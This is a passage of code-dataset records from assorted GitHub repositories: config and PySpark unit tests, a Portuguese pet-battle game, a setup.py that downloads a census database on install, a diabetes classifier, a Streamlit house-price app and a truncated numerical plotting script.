config.get_context_from_env(prefix=('SEPELIB', 'BSCONFIG'))\n\n env = {\n 'PATH': '/bin',\n 'SEPELIB_port': '8080',\n 'SEPELIB_logpath': '/usr/local/www/logs/sepelib-service.log'\n }\n context = {\n 'port': '8080',\n 'logpath': '/usr/local/www/logs/sepelib-service.log'\n }\n assert config.get_context_from_env(env_getter=lambda: env) == context\n bad_env = {\n 'SEPELIB_port': '8080',\n 'SEPELIB_log path': '/usr/local/www/logs/sepelib-service.log' # Has space in key\n }\n bad_context = {\n 'port': '8080'\n }\n with pytest.raises(ValueError):\n config.get_context_from_env(env_getter=lambda: bad_env)\n assert config.get_context_from_env(env_getter=lambda: bad_env, ignore_errors=True) == bad_context\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"infra/tests/test_core_config.py","file_name":"test_core_config.py","file_ext":"py","file_size_in_byte":3222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"43906258741","text":"\"\"\"\ntest_main.py\n------------\nThis code piece is to test the functions and methods created for the pipeline\nTests have been written with Python unitest case methods. Using setUpClass and tearDown\n\"\"\"\n\nimport os\nimport sys\n\nROOT_DIR = os.path.realpath(os.path.join(os.path.dirname(__file__), '../..'))\nsys.path.append(ROOT_DIR)\n\nimport unittest\nfrom utilities import helper\nfrom pyspark.sql.types import *\nfrom pyspark.sql import SparkSession\n\n\nclass SparkETLTestCase(unittest.TestCase):\n \"\"\"Test suite for extraction method\"\"\"\n\n @classmethod\n def setUpClass(self):\n\n os.environ['PYSPARK_PYTHON'] = sys.executable\n os.environ['PYSPARK_DRIVER_PYTHON'] = sys.executable\n\n self.spark = SparkSession.builder \\\n .appName(\"UnitTest\") \\\n .master(\"local[*]\") \\\n .getOrCreate()\n\n self.spark.sparkContext.setLogLevel(\"WARN\")\n\n @classmethod\n def tearDown(self):\n \"\"\"Stop Spark\"\"\"\n self.spark.stop()\n\n # This function is used to test the deduplication function in utilities.\n def test_dedup(self):\n\n #dummy dataset\n data = [\n (3794,\"United States\", 57, 'Other'),\n (3844,\"France\", 62, 'Female'),\n (3794,\"United States\", 57, 'Other'),\n (3844,\"France\", 62, 'Female')\n ]\n\n schema = StructType([\n StructField('customer_id', IntegerType(), True),\n StructField('country', StringType(), True),\n StructField('customer_age', IntegerType(), True),\n StructField('customer_gender', StringType(), True)\n ])\n\n input_df = self.spark.createDataFrame(data = data, schema = schema)\n\n # Define partition and order by columns\n partition_cols = [\"customer_id\"]\n order_by_cols = [\"customer_id\"]\n\n # Execute the dedup function\n result_df = helper.dedup(input_df, partition_cols, order_by_cols)\n\n # Define expected output DataFrame\n expected_data = [\n (3794,\"United States\", 57, 'Other'),\n (3844,\"France\", 62, 'Female')\n ]\n expected_df = self.spark.createDataFrame(data = expected_data, schema = schema)\n\n # Perform assertions on the result DataFrame\n self.assertEqual(sorted(expected_df.collect()), sorted(result_df.collect()))\n\n # This test is to check the transformation of currency conversion.\n def test_currency_conversion(self):\n # Create dummy input DataFrame\n data = [\n (1238, \"GBP\", \"USD\", '2020-02-16', 1.305168),\n (6392, \"GBP\", \"JPY\", '2020-02-16', 143.300879),\n (1239, \"GBP\", \"GBP\", '2020-02-16', 1.0),\n (1237, \"GBP\", \"EUR\", '2020-02-16', 1.203874)\n ]\n\n schema = StructType([\n StructField('exchange_rate_id', IntegerType(), True),\n StructField('from_currency', StringType(), True),\n StructField('to_currency', StringType(), True),\n StructField('effective_date', StringType(), True),\n StructField('rate', DoubleType(), True)\n ])\n\n input_df = self.spark.createDataFrame(data = data, schema = schema)\n\n # Define the currency to convert to\n to_currency = \"USD\"\n\n # Execute the currency_conversion function\n result_df = helper.currency_conversion(input_df, to_currency)\n result_df.show()\n\n # Define expected output DataFrame\n expected_data = [\n (\"2020-02-16\", \"USD\", \"USD\", 1.0),\n (\"2020-02-16\", \"JPY\", \"USD\", 0.009),\n (\"2020-02-16\", \"GBP\", \"USD\", 1.305),\n (\"2020-02-16\", \"EUR\", \"USD\", 1.084)\n ]\n\n expected_df = self.spark.createDataFrame(expected_data,\n [\"effective_date\", \"from_currency\", \"to_currency\", \"rate\"])\n\n # Perform assertions on the result DataFrame\n self.assertEqual(sorted(expected_df.collect()), sorted(result_df.collect()))\n\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"agrawaltejas/pyspark_project","sub_path":"src/tests/test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":3998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"72055818321","text":"import random\n\ngelo = 9\nfogo = 8\ntrovao = 8\nacido = 5\nraio = 7\nagua = 5\ngrama = 3\nsombra = 2\nlama = 1\n\n#--------Arrays--------\n#Pets = [0nome, 1vida, 2nivel, 3experiencia, 4Golpe1, 5Golpe2, 6Texto do Golpe, 7Texto do Golpe2]\nblits = [\"Blits\",40,0,0,raio,agua,\"raio\",\"agua\"]\nres = [\"Res\",40,0,0,lama,grama,\"lama\",\"grama\"]\ncardolv = [\"Cardolv\",40,0,0,sombra,lama,\"sombra\",\"acido\"]\nbyray = [\"Byray\",40,2,0,trovao, gelo,\"trovao\",\"gelo\"]\n\ntodos_pets = [blits,res,cardolv,byray]\nbanco_pet = []\nmeus_pets = [blits]\n\n#-------dados do player\ngold = 10\nPetbola = 2\npocao = 0\nbolsa = [gold,meus_pets,Petbola,pocao]\n#----------------\n#Vamos usar uma variavel como contador para limitar em até 5 pets que pode levar no bolso\nqtd_maxima_pets_na_bolsa = 1\n\nfimdejogo = False\n\naleatorio = random.randint(0, 3) #de 0 a 2\n\n \ndef comprar():\n while True:\n \n print(\"-----------\\nBem vindo a loja de itens\\n Você tem\",bolsa[0],\"de gold\")\n item = input(\"Os itens disponiveis para compra são:\\nPetbola(5 gold)\\nPocao(10 gold)\\nPara sair digite: sair\\nO que deseja comprar? \")\n if item == \"Petbola\" and bolsa[0] >= 5:\n bolsa[2] += 1\n bolsa[0] -= 5\n print(\"-----------\\n1x Petbola comprado\\nVocê tem\",bolsa[0],\"de gold\")\n \n \n elif(item == \"Pocao\" and bolsa[0] >= 10):\n bolsa[3] += 1\n bolsa[0] -= 10\n print(\"-----------\\n1x Pocao comprado (Ela recupera 10 pontos de vida)\\nVocê tem\",bolsa[0],\"de gold\")\n \n elif(item == \"sair\"):\n break\n else:\n print(\"Gold Insuficiente\\n\")\n \ndef bancopet():\n while True:\n opcao_banco = input(\"Computador ligado,\\nDigite a opção desejada:\\ndepositar pet\\nsacar pet\\nsair\\n\")\n if(opcao_banco == \"sair\"):\n break\n \n elif(opcao_banco == \"depositar pet\"):\n if(qtd_maxima_pets_na_bolsa <= 1):\n print(\">>>Você deve ter pelo menos 1 pet na sua bolsa!\") \n break\n else:\n print(\"Seus Pets na sua bolsa:\\n\",meus_pets)\n posicao = int(input(\"\\nPara depositar, digite a posição do pet na sua bolsa\\nExemplo:Se for o primeiro digite 0, se for o segundo digite 1...\\n\"))\n banco_pet.append(meus_pets[posicao])#adicionando o pet no banco\n meus_pets.pop(posicao) #removendo pet da bolsa\n print(\"Pet Depositado\\nPets em sua bolsa:\")\n print(meus_pets)\n qtd_maxima_pets_na_bolsa -= 1\n \n \n elif(opcao_banco == \"sacar pet\"):\n if(qtd_maxima_pets_na_bolsa >= 5):\n print(\">>>Qantidade maxima de pets na bolsa é 5\") \n break\n else:\n print(\"Seus Pets na sua bolsa:\\n\",meus_pets)\n print(\"Seus Pets no banco:\\n\",banco_pet)\n posicao_banco = int(input(\"\\nPara sacar, digite a posição do pet no banco\\nExemplo:Se for o primeiro digite 0, se for o segundo digite 1...\\n\"))\n meus_pets.append(banco_pet[posicao_banco])#adicionando o pet no banco\n banco_pet.pop(posicao_banco) #removendo pet da bolsa\n print(\"Pet Sacado\\nPets em sua bolsa:\")\n print(meus_pets)\n qtd_maxima_pets_na_bolsa += 1 \n \n\ndef explorar():\n oponente = todos_pets[aleatorio]\n print(\"\\n-----------------\\nVocê explora a floresta e de repente encontra um pet selvagem\")\n print(\"Você encontrou o pet:\",oponente[0])\n print(\"\\nSeus pets\",meus_pets)\n posicao_batalha = int(input(\"Escolha um pet para batalha! Digite a posição do pet no banco\\nExemplo:Se for o primeiro digite 0, se for o segundo digite 1...\\n\"))\n petembatalha = meus_pets[posicao_batalha]\n print(\"\\n-----------------\\nPet selecionado:\",petembatalha,\"\\n-----------------\\n\")\n \n while oponente[1] > 0:\n petembatalha[1] = petembatalha[1] - oponente[4]\n print(\">>>Pet oponente usou\",oponente[6],\"e te causou \",oponente[4],\"de dano\")\n print(\">Sua vida\",petembatalha[1],\"vida do oponente\",oponente[1])\n print(\"-----\\nSeus golpes são:\\n\",petembatalha[6],\"\\n\",petembatalha[7],\"\\n-----\\n\")\n escolha = input(\"Digite o golpe que deseja utilizar: \")\n \n if(escolha == petembatalha[6]):\n oponente[1] = oponente[1] - petembatalha[4]\n print(\"\\n>>>você usou\",petembatalha[6],\"e causou\",petembatalha[4],\"de dano no pet opnonente<<<\\n\")\n \n \n elif(escolha == petembatalha[7]):\n oponente[1] = oponente[1] - petembatalha[5]\n print(\"\\n>>>você usou\",petembatalha[7],\"e causou\",petembatalha[5],\"de dano no pet opnonente<<<\\n\")\n \n else:\n print(\"Vê digitou algo errado\\n\")\n \n #repeti o codigo para o adversario usar um golpe diferente desta vez\n petembatalha[1] = petembatalha[1] - oponente[5]\n print(\">>>Pet oponente usou\",oponente[7],\"e te causou \",oponente[4],\"de dano\")\n print(\">Sua vida\",petembatalha[1],\"vida do oponente\",oponente[1])\n print(\"-----\\nSeus golpes são:\\n\",petembatalha[6],\"\\n\",petembatalha[7])\n escolha = input(\"Digite o golpe que deseja utilizar: \")\n \n if(escolha == petembatalha[6]):\n oponente[1] = oponente[1] - petembatalha[4]\n print(\"\\n>>>você usou\",petembatalha[6],\"e causou\",petembatalha[4],\"de dano no pet oponente<<<\\n\")\n \n \n elif(escolha == petembatalha[7]):\n oponente[1] = oponente[1] - petembatalha[5]\n print(\"\\n>>>você usou\",petembatalha[7],\"e causou\",petembatalha[5],\"de dano no pet opnonente<<<\\n\")\n \n else:\n print(\"Vê digitou algo errado\\n\")\n \n petembatalha2 = petembatalha\n if(petembatalha2[1] <= 0):\n fimdejogo = True\n\n else:\n print(\"\\n>>>>>Você ganhou +2 de experiencia<<<<<\")\n petembatalha2[3] += 2\n if(petembatalha2[3] >= 10):\n petembatalha2[3] = 0\n petembatalha2[2] += 1\n print(\"Seu pet\",petembatalha2[0],\"Subiu de nivel.\\nNivel atual:\",petembatalha2[3])\n if(bolsa[2] <= 0):\n print(\"Você não possui Petbolas suficiente, compre mais na loja\")\n meus_pets[posicao_batalha] = petembatalha2\n else:\n escolha = input(\"Vocês deseja tentar capturar este Pet? Digite sim ou nao: \")\n if(escolha == \"sim\"):\n bolsa[2] -= 1\n print(\"Você lançou uma Petbola\")\n tentasorte = random.randint(0, 1)\n if(tentasorte == 1):\n print(\"Você conseguiu capturar o Pet\")\n meus_pets[posicao_batalha] = petembatalha2\n if(qtd_maxima_pets_na_bolsa >= 5):\n print(\"Você atingiu o limite maximo de 5 pets na bolsa,o pet capturado foi transferido para o banco\")\n banco_pet.append(oponente)\n print(oponente[0],\"capturado foi adicionado ao Banco Pet\\n\")\n meus_pets[posicao_batalha] = petembatalha2\n else:\n meus_pets.append(oponente)\n meus_pets[posicao_batalha] = petembatalha2\n qtd_maxima_pets_na_bolsa += 1\n \n else:\n print(\"O Pet fugiu e você não conseguiu captura-lo, tente novamente outra vez\")\n meus_pets[posicao_batalha] = petembatalha2\n \n\ndef curarpet():\n print(\"Seus Pets na sua bolsa:\\n\",meus_pets)\n posicao_curar = int(input(\"\\nPara curar, digite a posição do pet na sua bolsa\\nExemplo:Se for o primeiro digite 0, se for o segundo digite 1...\\n\"))\n petparacurar = meus_pets[posicao_curar]\n petparacurar[1] = 40\n print(\"Vida do\",petparacurar[0],\"restaurada para 40 de vida\")\n meus_pets[posicao_curar] = petparacurar\n\n\nwhile True:\n if(fimdejogo == True):\n break\n else:\n opcao = input(\"Digite uma das seguintes opções: bolsa, explorar, petshop, ajuda :\")\n \n if(opcao == \"ajuda\"):\n print(\"--------------\\nSempre digite a opção \\nExplorar: Para procurar um pet selvagem\\nPetshop: local com diversas funções\\n--------------\")\n \n elif(opcao == \"petshop\"):\n opcao2 = input(\"\\nBem vindo ao Petshop digite uma das opções: comprar, bancopet, curar pet, sair: \")\n if opcao2 == \"comprar\":\n comprar()\n elif opcao2 == \"bancopet\":\n bancopet()\n \n elif opcao2 == \"curar pet\":\n curarpet()\n \n else:\n print(\"Saindo do Petshop\")\n \n elif opcao == \"bolsa\":\n print(\"-----------\\nSua bolsa contém os seguinte itens:\")\n print(\"Gold:\",bolsa[0],\"\\nSeus Pets:\",bolsa[1],\"\\nPetbolas:\",bolsa[2],\"\\nPocoes:\",bolsa[3],\"\\n-----------\\n\")\n \n elif(opcao == \"explorar\"):\n explorar()\n\n\n#Desenvolvido por Leonardo Luis Mascarenhas\n\n\n\n","repo_name":"Leotrevi/Petworld","sub_path":"pet-world-4.py","file_name":"pet-world-4.py","file_ext":"py","file_size_in_byte":9280,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"39051083032","text":"from setuptools import setup\nfrom setuptools.command.install import install\n\n\nURL = \"http://dev.dataiku.com/~cstenac/dev-recruiting/us-census.db.gz\"\nLOCAL = \"resources/us-census.db.gz\"\nLOCAL_EXTRACT = \"resources/us-census.db\"\n\nclass MyInstall(install):\n def run(self):\n install.run(self)\n import urllib\n urllib.urlretrieve(URL, LOCAL)\n from subprocess import call\n call(['gunzip', LOCAL])\n\nconfig = {\n 'description': 'A web application querying a database',\n 'author': u'Sébastien Diemer',\n 'url': 'https://github.com/sebdiem/webapp',\n 'download_url': 'https://github.com/sebdiem/webapp',\n 'author_email': 'diemersebastien@yahoo.fr',\n 'version': '0.1',\n 'install_requires': ['flask'],\n 'packages': ['webapp'],\n 'scripts': [],\n 'name': 'webapp',\n 'cmdclass': {'install': MyInstall}\n}\n\nsetup(**config)\n","repo_name":"sebdiem/webapp","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"71436293520","text":"import joblib\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import train_test_split\n\n\ndf = pd.read_csv('diabetes_prediction_dataset.csv')\n# print(df.head())\n# print(df.tail())\n# print(df.shape)\n# print(df.info())\n# print(df.describe())\n# print(df.isnull())\n\ngender_map = {'Female': 0.0, 'Male': 1.0, 'Other': 2.0}\ndf['gender'] = df['gender'].map(gender_map)\n\nsmoking_map = {'never': 0.0, 'current': 1.0, 'former': 2.0, 'No Info': 3.0, 'not current': 4.0, 'ever': 5.0}\ndf['smoking_history'] = df['smoking_history'].map(smoking_map)\ndf = df.astype(float)\n\n# missing_values = df.isnull().sum()\n# print(missing_values)\n\nfeature_names = df.columns.tolist()\ncolumn_to_drop = 'diabetes'\nif column_to_drop in feature_names:\n feature_names.remove(column_to_drop)\n# print(feature_names)\n\n#split dataset\nx = df.drop('diabetes', axis='columns')\ny = df['diabetes']\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.2, random_state=10000)\ny_train = np.ravel(y_train)\n\nx_train_df = pd.DataFrame(x_train, columns=feature_names)\nx_test_df = pd.DataFrame(x_test, columns=feature_names)\n\nmodel = RandomForestClassifier(n_estimators=100, criterion='gini')\nmodel.fit(x_train_df, y_train)\n\ny_pred = model.predict(x_test_df)\n# print(y_pred)\naccuracy = model.score(x_test_df, y_test)\nprint(\"Accuracy:\", accuracy)\npatient = [1.0, 57.0, 0.0, 0.0, 3.0, 57.1, 6.5, 126.0]\npatient_df = pd.DataFrame([patient], columns=feature_names)\nprediction = model.predict(patient_df)\nif prediction == 0:\n print(\"Diabetes test result is negative\")\nelse:\n print(\"Diabetes test result is positive\")\n","repo_name":"farzanasumona/diabetes-predictor-machine-learning-project","sub_path":"MLmodel/train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"42688737750","text":"import streamlit as st \nimport numpy as np \nimport pandas as pd \nimport pickle \nfrom PIL import Image\n\npd.options.display.max_columns = 150 \n\n\nst.title(\"Prediction de prix d'une maison\")\n\n\nsqft_living = st.number_input('Surface en squarefeet', value = 300, key ='sqft_living')\nst.write('La surface est de', sqft_living, \"squarefeet\")\n\n\nbedrooms = st.number_input('Nombre de chambres', value = 1, key = 'bedrooms')\nst.write('Il y a', bedrooms, \"chambres\")\n\n\nbathrooms = st.number_input('Nombre de salle de bains', value = 1, key = 'bathrooms')\nst.write('Il y a', bathrooms, \"salle de bains\")\n\n\nsqft_lot = st.slider(\"Surface du jardin\" , 0, 2200000, 500, key = 'sqft_lot')\nst.write(\"La surface du jardin est de \" , sqft_lot)\n\n\n\nfloors = st.number_input(\"Nombre d'étage\", value = 1, key = 'floors')\nst.write('Il y a', floors, 'étage(s)' )\n\n\nwaterfront = st.radio(\"Possede t-elle une vue sur la mer?\" , ('Oui', 'Non'), key = 'waterfront' ) \n\nif waterfront == 'Yes': \n waterfront = 1\nelse: \n waterfront = 0\n \n\nview = st.slider('Notez la vue de 0 à 4', 0, 4, 2, key = 'view')\nst.write(\"La vue est de\" , view , \"sur 4.\")\n\n\ncondition = st.slider(\"Notez l'état de l'appartement de 1 à 5\" , 1, 5, 3, key = 'condition')\nst.write(\"L'état est de\" , condition , \"sur 5.\")\n\n\ngrade = st.slider(\n\"Un indice de 1 à 13, où 1-3 est un niveau faible de construction, de design et de la conception des bâtiments, et 11-13 ont un niveau de qualité élevé \", 1, 13, 6, key = 'grade')\nst.write(\"Le grade est de\" , grade , \"sur 13.\")\n\n\nsqft_above = st.slider(\"Superficie en squarefeet de la surface qui se situe au rez-de-chaussée ainsi que dans les étages\" , 0, 22000, 100, key = 'sqft_above')\nst.write('Cette surface est de', sqft_above)\n\n\nsqft_basement = st.slider('Superficie en squarefeet de la surface qui se situe en dessous du rez-de-chaussée', 0, 22000, 100 , key = 'sqft_basement')\nst.write('Cette surface est de', sqft_basement)\n\n\nyr_built = st.slider('Année de construction', 1900, 2022, 2000, key = 'yr_built')\nst.write('Le bien a été construit en', yr_built )\n\n\nyr_renovated = st.slider(\"Année de rénovation, indiquez 0 si il n'y a jamais eu de rénovation \", 0, 2022, 0, key = 'yr_renovated')\nst.write('Le bien a été rénové en', yr_renovated )\n\n\n\n\nzipcode = st.selectbox(\n 'Quel est le code postal?',\n (\n\"98001\",\n\"98002\",\n\"98003\",\n\"98004\",\n\"98005\",\n\"98006\",\n\"98007\",\n\"98008\",\n\"98009\",\n\"98010\",\n\"98011\",\n\"98013\",\n\"98014\",\n\"98015\",\n\"98019\",\n\"98022\",\n\"98023\",\n\"98024\",\n\"98025\",\n\"98027\",\n\"98028\",\n\"98029\",\n\"98030\",\n\"98031\",\n\"98032\",\n\"98033\",\n\"98034\",\n\"98035\",\n\"98038\",\n\"98039\",\n\"98040\",\n\"98041\",\n\"98042\",\n\"98045\",\n\"98047\",\n\"98050\",\n\"98051\",\n\"98052\",\n\"98053\",\n\"98055\",\n\"98056\",\n\"98057\",\n\"98058\",\n\"98059\",\n\"98062\",\n\"98063\",\n\"98064\",\n\"98065\",\n\"98070\",\n\"98071\",\n\"98072\",\n\"98073\",\n\"98074\",\n\"98075\",\n\"98077\",\n\"98083\",\n\"98089\",\n\"98092\",\n\"98093\",\n\"98101\",\n\"98102\",\n\"98103\",\n\"98104\",\n\"98105\",\n\"98106\",\n\"98107\",\n\"98108\",\n\"98109\",\n\"98111\",\n\"98112\",\n\"98113\",\n\"98114\",\n\"98115\",\n\"98116\",\n\"98117\",\n\"98118\",\n\"98119\",\n\"98121\",\n\"98122\",\n\"98124\",\n\"98125\",\n\"98126\",\n\"98127\",\n\"98129\",\n\"98131\",\n\"98133\",\n\"98134\",\n\"98136\",\n\"98138\",\n\"98139\",\n\"98141\",\n\"98144\",\n\"98145\",\n\"98146\",\n\"98148\",\n\"98154\",\n\"98155\",\n\"98158\",\n\"98160\",\n\"98161\",\n\"98164\",\n\"98165\",\n\"98166\",\n\"98168\",\n\"98170\",\n\"98174\",\n\"98175\",\n\"98177\",\n\"98178\",\n\"98181\",\n\"98185\",\n\"98188\",\n\"98190\",\n\"98191\",\n\"98194\",\n\"98195\",\n\"98198\",\n\"98199\",\n\"98224\",\n\"98288\"), key = 'zipcode')\nst.write('Le code postal est ', zipcode)\n\n\n\n\n\nlat = st.number_input(\"Entrez la latitude du bien\", value = 47, key = 'lat')\nst.write('lat:', lat) \n\nlong = st.number_input(\"Entrez la longitude du bien\", value = -122, key = 'long')\nst.write('long:', long) \n\n\nyear = st.slider('Année de mise en vente', 2022, 2026, 2022, key = 'year')\n\nmonth = st.slider('Mois de mise en vente', 1, 12, 6, key = 'month')\n\n\n\ndata = {\n 'sqft_living':sqft_living,\n 'bedrooms': bedrooms,\n 'bathrooms':bathrooms,\n 'sqft_lot':sqft_lot,\n 'floors':floors,\n 'waterfront':waterfront,\n 'view':view,\n 'condition':condition,\n 'grade':grade,\n 'sqft_above':sqft_above,\n 'sqft_basement':sqft_basement,\n 'yr_built':yr_built,\n 'yr_renovated':yr_renovated,\n 'zipcode':zipcode,\n 'lat':lat,\n 'long':long,\n 'year':year,\n 'month':month\n}\n\nparametres = pd.DataFrame(data, index=[0])\n\n\nX = pd.read_csv(\"df_cleaned.csv\")\ny = pd.read_csv(\"df_modelisation_price.csv\")\n\n\n\nparametres['zipcode'] = parametres['zipcode'].astype(str)\nparametres['month'] = parametres['month'].astype(str)\n\npickle_in = open('my_pipe_lr.pkl', 'rb') \nmy_pipe_lr = pickle.load(pickle_in)\n\n\n\nif st.button('Estimez le prix de votre bien'):\n print(parametres.info())\n print(\"-----------------\")\n print(data)\n prediction = my_pipe_lr.predict(parametres)\n\n prix = round(prediction[0][0],2)\n st.write('# Le prix du bien immobilier est:', prix, \"$\")\n \n# Image\nimg = Image.open(\"maison.jpg\")\nst.image(img, width=700, caption='House in king county')","repo_name":"yaniskahoul/prediction_prix_maison","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"36524785597","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.lines import Line2D\nimport os\nimport math\nfrom scipy.interpolate import interp1d\nfrom scipy.interpolate import InterpolatedUnivariateSpline, UnivariateSpline\n\nflying = 'flying'\nname = 'results'\narquivos = os.listdir(flying)\n\nfor arq in arquivos:\n if arq.startswith(name):\n\n x_MOC = np.array([0, 0.0615711, 0.121019, 0.181529, 0.214437, 0.214968, \\\n 0.396497, 0.544586, 0.725584, 0.726115, 0.835987, 0.835987, 1.0552, \\\n 1.05573, 1.09395, 1.09395, 1.5])\n Sg_MOC = np.array([1, 1, 1, 1, 1, 0.947941, 0.947941, 0.947941, 0.947552, \\\n 0.877622, 0.877622, 0.772727, 0.734266, 0.563326, 0.563326, 0, 0])\n\n x_zC1_MOC = np.array([1, 1.0427, 1.04483, 1.04583, 1.04724, 1.04793, \\\n 1.04878, 1.05016, 1.05194, 1.05326, 1.0547, 1.05611, 1.05808, 1.06021, \\\n 1.06231, 1.06432, 1.06642, 1.06767, 1.0698, 1.07206, 1.07415, 1.07572, \\\n 1.07823, 1.08064, 1.08596, 1.0927, 1.09305, 1.09323, 1.09342, 1.09348, \\\n 1.09364, 1.09389, 1.09417, 1.09455, 1.09499, 1.09574, 1.09668, 1.09828, \\\n 1.09975, 1.10636, 1.12607, 1.13434, 1.14223, 1.14981])\n\n zC1_MOC = np.array([0, 2.978236e-4, 0.00476518, 0.00863688, 0.0178694, \\\n 0.0254639, 0.0379725, 0.070882, 0.133276, 0.20252, 0.282635, 0.353666, \\\n 0.43795, 0.506598, 0.551271, 0.57614, 0.593265, 0.600561, 0.608007, \\\n 0.612772, 0.615006, 0.616495, 0.617239, 0.617984, 0.617835, 0.617835, \\\n 0.612176, 0.60622, 0.593414, 0.561249, 0.502726, 0.384341, 0.297973, \\\n 0.285762, 0.275934, 0.264765, 0.257617, 0.251959, 0.250767, 0.249725, \\\n 0.249576, 0.249725, 0.249576, 0.250023])\n\n x_zC1_LLF = np.array([1.0021, 1.00968, 1.01732, 1.02494, 1.03258, 1.04016, \\\n 1.04759, 1.0552, 1.06288, 1.07021, 1.07794, 1.08515, 1.0933, 1.1005, \\\n 1.10824, 1.1157, 1.1234, 1.13105, 1.1386, 1.1459, 1.14972])\n zC1_LLF = np.array([0.0820504, 0.0972394, 0.114513, 0.133276, 0.152188, \\\n 0.172589, 0.193436, 0.215178, 0.237216, 0.258809, 0.280699, 0.301546, \\\n 0.322841, 0.333414, 0.310779, 0.249725, 0.216667, 0.222325, 0.22858, \\\n 0.233196, 0.234536])\n\n x_zC1_DW = np.array([1.00244, 1.00987, 1.01745, 1.025, 1.03261, 1.03997, \\\n 1.04774, 1.05523, 1.06275, 1.07046, 1.07804, 1.08543, 1.09295, 1.10063, \\\n 1.10827, 1.11275, 1.11563, 1.1234, 1.13073, 1.13847, 1.1459])\n zC1_DW = np.array([0.0479496, 0.0635853, 0.0817526, 0.103047, 0.129107, \\\n 0.158442, 0.188969, 0.223517, 0.259107, 0.295441, 0.33118, 0.366472, \\\n 0.397892, 0.39819, 0.304078, 0.268041, 0.241535, 0.241237, 0.241833, \\\n 0.241535, 0.243918])\n\n x_zC1_MDW = np.array([1.00244, 1.00987, 1.01745, 1.025, 1.03261, 1.03997, \\\n 1.04774, 1.05523, 1.06275, 1.07046, 1.07804, 1.08543, 1.09314, 1.10063, \\\n 1.10661, 1.10946, 1.11291, 1.11626, 1.12356, 1.13083, 1.13838])\n zC1_MDW = np.array([0.0479496, 0.0635853, 0.0817526, 0.103047, 0.129107, \\\n 0.158442, 0.188969, 0.223517, 0.259107, 0.295441, 0.33118, 0.366472, \\\n 0.39134, 0.379129, 0.335052, 0.303036, 0.271317, 0.237068, 0.237365, \\\n 0.238706, 0.241535])\n\n x_zC1_ROE = np.array([1.00244, 1.00987, 1.01745, 1.025, 1.03261, 1.03997, \\\n 1.04774, 1.05523, 1.06275, 1.07046, 1.07804, 1.08543, 1.09314, 1.10066, \\\n 1.10815, 1.11579, 1.12343, 1.13086, 1.13844, 1.14599])\n zC1_ROE = np.array([0.0479496, 0.0635853, 0.0817526, 0.103047, 0.129107, \\\n 0.158442, 0.188969, 0.223517, 0.259107, 0.295441, 0.33118, 0.366472, \\\n 0.397892, 0.419038, 0.347858, 0.235876, 0.237663, 0.238855, 0.240641, \\\n 0.242279])\n\n f = interp1d(x_MOC,Sg_MOC)\n\n \"\"\"---------------------- Convergence Study -------------------------\"\"\"\n\n datas = np.load('flying/results_case1_Moshiri_Manzari_5k_4000_FOU_8726.npy', allow_pickle=True)\n for data in datas[datas.shape[0]-1:]:\n So_FOU_4000 = data[6]\n Sg_FOU_4000 = data[7]\n zCO2_FOU_4000 = data[10][0]\n x_4000 = np.linspace(0,1.5,4000)\n f = interp1d(x_4000,zCO2_FOU_4000)\n\n \"\"\"----------------------------- FOU --------------------------------\"\"\"\n\n datas = np.load('flying/results_case1_Moshiri_Manzari_5k_8_FOU_37.npy', allow_pickle=True)\n for data in datas[datas.shape[0]-1:]:\n So_FOU_8 = data[6]\n Sg_FOU_8 = data[7]\n zC1_FOU_8 = data[10][1]\n zCO2_FOU_8 = data[10][0]\n xkj_FOU_8 = data[13]\n\n xkj_FOU_8[:,1,Sg_FOU_8==0] = 0\n xkj_FOU_8[:,0,So_FOU_8==0] = 0\n x_8 = np.linspace(0,1.5,len(So_FOU_8))\n n = 8\n e8_L1_FOU = (sum(abs(f(x_8)- data[10][0]))*(1/n))\n t8_FOU = data[2]\n\n datas = np.load('flying/results_case1_Moshiri_Manzari_5k_16_FOU_36.npy', allow_pickle=True)\n for data in datas[datas.shape[0]-1:]:\n So_FOU_16 = data[6]\n Sg_FOU_16 = data[7]\n zC1_FOU_16 = data[10][1]\n zCO2_FOU_16 = data[10][0]\n xkj_FOU_16 = data[13]\n\n xkj_FOU_16[:,1,Sg_FOU_16==0] = 0\n xkj_FOU_16[:,0,So_FOU_16==0] = 0\n x_16 = np.linspace(0,1.5,len(So_FOU_16))\n n = 16\n e16_L1_FOU = (sum(abs(f(x_16)-data[10][0]))*(1/n))\n R16_L1_FOU = math.log(e8_L1_FOU/e16_L1_FOU,2)\n t16_FOU = data[2]\n\n datas = np.load('flying/results_case1_Moshiri_Manzari_5k_32_FOU_118.npy', allow_pickle=True)\n for data in datas[datas.shape[0]-1:]:\n So_FOU_32 = data[6]\n Sg_FOU_32 = data[7]\n zC1_FOU_32 = data[10][1]\n zCO2_FOU_32 = data[10][0]\n xkj_FOU_32 = data[13]\n\n xkj_FOU_32[:,1,Sg_FOU_32==0] = 0\n xkj_FOU_32[:,0,So_FOU_32==0] = 0\n x_32 = np.linspace(0,1.5,len(So_FOU_32))\n n = 32\n e32_L1_FOU = (sum(abs(f(x_32)-data[10][0]))*(1/n))\n R32_L1_FOU = math.log(e16_L1_FOU/e32_L1_FOU,2)\n e32_L2_FOU = np.sqrt(np.sum((f(x_32)-data[10][0])**2) * 1 / n)\n\n t32_FOU = data[2]\n\n datas = np.load('flying/results_case1_Moshiri_Manzari_5k_64_FOU_142.npy', allow_pickle=True)\n for data in 